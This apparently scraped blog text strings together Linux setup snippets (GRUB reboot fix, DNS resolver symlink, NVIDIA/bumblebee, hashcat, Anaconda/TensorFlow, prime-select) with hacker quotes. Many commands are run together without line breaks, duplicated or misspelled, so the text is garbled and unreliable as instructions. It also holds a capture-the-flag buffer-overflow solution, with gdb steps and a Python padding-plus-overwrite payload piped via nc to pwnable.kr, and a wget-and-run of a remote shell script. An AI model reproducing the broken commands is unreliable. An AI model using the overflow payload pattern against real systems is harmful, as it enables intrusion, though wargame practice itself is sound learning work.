sudo nano /etc/default/grubLocate the following line :
GRUB_CMDLINE_LINUX=""and replaces it with :
GRUB_CMDLINE_LINUX="reboot=efi"After that, run the following command and reboot with command :
sudo update-grub
sudo rebootThat's all! See you.
Open Source is a great idea and it has changed the world!
Open Source forever ....
While you do not know attack, how can you know about defense? (未知攻,焉知防?)
Do BAD things .... for the RIGHT reasons -- OWASP ZAP
It is easier to port a shell than a shell script. -- Larry Wall
Most of you are familiar with the virtues of a programmer. There are three, of course: laziness, impatience, and hubris. -- Larry Wall
为天地立心, 为生民立命, 为往圣继绝学, 为万世开太平。 -- 王炜
sudo nano /etc/default/grubGRUB_CMDLINE_LINUX=""GRUB_CMDLINE_LINUX="reboot=efi"sudo update-grub
sudo rebootsudo mv /etc/resolv.conf /etc/resolv.conf-original
sudo ln -s /run/systemd/resolve/resolv.conf /etc/resolv.conf
sudo systemctl restart systemd-resolvedgdb -q ./bofdisass maindisass funcb *func+47x/x $ebp+0x8
x/s $eax(python -c 'print "A"*52 + "\xbe\xba\xfe\xca"'; cat -) | nc pwnable.kr 9000apt update
apt install browser-plugin-freshplayer-pepperflash pepperflashplugin-nonfreewget https://raw.githubusercontent.com/cybernova/fireflashupdate/master/fireflashupdate.sh
chmod +x fireflashupdate.sh
./fireflashupdate.sh./fireflashupdate.shapt update
apt install virtualbox-dkms virtualbox-ext-pack virtualbox-guest-additions-isoapt updaate
apt install nvidia-kernel-dkms primus bumblebee bbswitch-dkms nvidia-sminvidia-smiapt install hashcat-nvidiaapt install nvidia-cuda-toolkitbumblebeed --daemon
optirun [program]sudo apt install build-essential libssl-dev libffi-dev python3-devwget https://repo.continuum.io/archive/Anaconda3-5.3.0-Linux-x86_64.shchmod +x Anaconda3-5.3.0-Linux-x86_64.sh./Anaconda3-5.3.0-Linux-x86_64.shsource /home/samiux/.bashrcconda update --prefix /home/samiux/anaconda3 anaconda
conda update -n base condaconda create -n venv pip python=3.6
conda install tensorflow -n venvconda activate venvconda deactivate(venv) samiux@ubuntu:~$ python -c "import tensorflow as tf; print(tf.__version__)"1.11.0nvidia-settingsprime-select querysudo prime-select intelsudo prime-select nvidiaprime-select querysudo apt install git rustc cargo lightdm
git clone https://github.com/matthieugras/Prime-Ubuntu-18.04
cd Prime-Ubuntu-18.04
cd prime_socket/src
sudo make installsudo mv /usr/bin/prime-select /usr/bin/prime-select-originalsudo dpkg-reconfigure gdm3sudo nano /etc/modprobe.d/zz-nvidia-modeset.conf# enable prime-sync
options nvidia-drm modeset=1sudo update-initramfs -usudo prime-select intelsudo prime-select nvidiaprime-select queryubuntu-drivers devicessudo ubuntu-drivers autoinstall